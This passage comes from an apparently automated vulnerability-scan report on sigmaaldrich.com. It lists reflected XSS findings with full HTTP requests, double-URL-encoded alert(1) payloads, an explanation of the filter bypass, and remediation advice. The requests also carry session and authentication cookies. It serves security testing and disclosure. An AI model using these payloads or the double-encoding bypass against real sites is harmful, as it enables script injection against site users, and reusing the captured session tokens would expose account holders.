Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930591823&t2=1289930592337&t3=1289930594943&t4=1289930591682&lti=1289930594943&ln=&hr=/customer-service/services.html&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/technical-service-home/product-catalog.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":4,"to":2.7,"c":"http://www.sigmaaldrich.com/technical-service-home/product-catalog.html","lc":{"d0":{"v":4,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22t%22%3A1289930594958%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22l%22%3A%22Services%22%2C%22de%22%3A%7B%22ti%22%3A%22Sigma%20Aldrich%20Product%20Directory%20Home%22%2C%22nw%22%3A310%2C%22nl%22%3A143%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:13 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28944


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/customer-service8eb43";alert(1)//db39faf8c5b/services.flagdisplay.js","E404") ;
   </script>
...[SNIP]...

1.248. http://www.sigmaaldrich.com/customer-service/services.flagdisplay.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /customer-service/services.flagdisplay.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0cc1%2522%253balert%25281%2529%252f%252f188bdb78de2 was submitted in the REST URL parameter 2. This input was echoed as a0cc1";alert(1)//188bdb78de2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /customer-service/a0cc1%2522%253balert%25281%2529%252f%252f188bdb78de2?id=1289930503318 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/customer-service/services.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930591823&t2=1289930592337&t3=1289930594943&t4=1289930591682&lti=1289930594943&ln=&hr=/customer-service/services.html&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/technical-service-home/product-catalog.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":4,"to":2.7,"c":"http://www.sigmaaldrich.com/technical-service-home/product-catalog.html","lc":{"d0":{"v":4,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22t%22%3A1289930594958%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22l%22%3A%22Services%22%2C%22de%22%3A%7B%22ti%22%3A%22Sigma%20Aldrich%20Product%20Directory%20Home%22%2C%22nw%22%3A310%2C%22nl%22%3A143%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:15 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/customer-service/a0cc1";alert(1)//188bdb78de2","E404") ;
   </script>
...[SNIP]...

1.249. http://www.sigmaaldrich.com/customer-service/services.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /customer-service/services.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c170%2522%253balert%25281%2529%252f%252fe8f57a7fc7e was submitted in the REST URL parameter 1. This input was echoed as 2c170";alert(1)//e8f57a7fc7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /customer-service2c170%2522%253balert%25281%2529%252f%252fe8f57a7fc7e/services.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/technical-service-home/product-catalog.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930591823&t2=1289930592337&t3=1289930594943&t4=1289930591682&lti=1289930594943&ln=&hr=/customer-service/services.html&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/technical-service-home/product-catalog.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":4,"to":2.7,"c":"http://www.sigmaaldrich.com/technical-service-home/product-catalog.html","lc":{"d0":{"v":4,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22t%22%3A1289930594958%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22l%22%3A%22Services%22%2C%22de%22%3A%7B%22ti%22%3A%22Sigma%20Aldrich%20Product%20Directory%20Home%22%2C%22nw%22%3A310%2C%22nl%22%3A143%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:07 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28934


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/customer-service2c170";alert(1)//e8f57a7fc7e/services.html","E404") ;
   </script>
...[SNIP]...

1.250. http://www.sigmaaldrich.com/customer-service/services.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /customer-service/services.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8308b%2522%253balert%25281%2529%252f%252f74207fc45bc was submitted in the REST URL parameter 2. This input was echoed as 8308b";alert(1)//74207fc45bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /customer-service/8308b%2522%253balert%25281%2529%252f%252f74207fc45bc HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/technical-service-home/product-catalog.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930591823&t2=1289930592337&t3=1289930594943&t4=1289930591682&lti=1289930594943&ln=&hr=/customer-service/services.html&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/technical-service-home/product-catalog.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":4,"to":2.7,"c":"http://www.sigmaaldrich.com/technical-service-home/product-catalog.html","lc":{"d0":{"v":4,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22t%22%3A1289930594958%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22l%22%3A%22Services%22%2C%22de%22%3A%7B%22ti%22%3A%22Sigma%20Aldrich%20Product%20Directory%20Home%22%2C%22nw%22%3A310%2C%22nl%22%3A143%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:09 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/customer-service/8308b";alert(1)//74207fc45bc","E404") ;
   </script>
...[SNIP]...

1.251. http://www.sigmaaldrich.com/etc/controller/controller-page.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/controller/controller-page.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9ffb%2522%253balert%25281%2529%252f%252f5c05ca51e02 was submitted in the REST URL parameter 1. This input was echoed as b9ffb";alert(1)//5c05ca51e02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcb9ffb%2522%253balert%25281%2529%252f%252f5c05ca51e02/controller/controller-page.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:46 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcb9ffb";alert(1)//5c05ca51e02/controller/controller-page.html","E404") ;
   </script>
...[SNIP]...

1.252. http://www.sigmaaldrich.com/etc/controller/controller-page.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/controller/controller-page.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6716%2522%253balert%25281%2529%252f%252f9969eaadf91 was submitted in the REST URL parameter 2. This input was echoed as a6716";alert(1)//9969eaadf91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/controllera6716%2522%253balert%25281%2529%252f%252f9969eaadf91/controller-page.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:48 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/controllera6716";alert(1)//9969eaadf91/controller-page.html","E404") ;
   </script>
...[SNIP]...

1.253. http://www.sigmaaldrich.com/etc/controller/controller-page.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/controller/controller-page.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e59ce%2522%253balert%25281%2529%252f%252fe53797cac39 was submitted in the REST URL parameter 3. This input was echoed as e59ce";alert(1)//e53797cac39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/controller/e59ce%2522%253balert%25281%2529%252f%252fe53797cac39 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
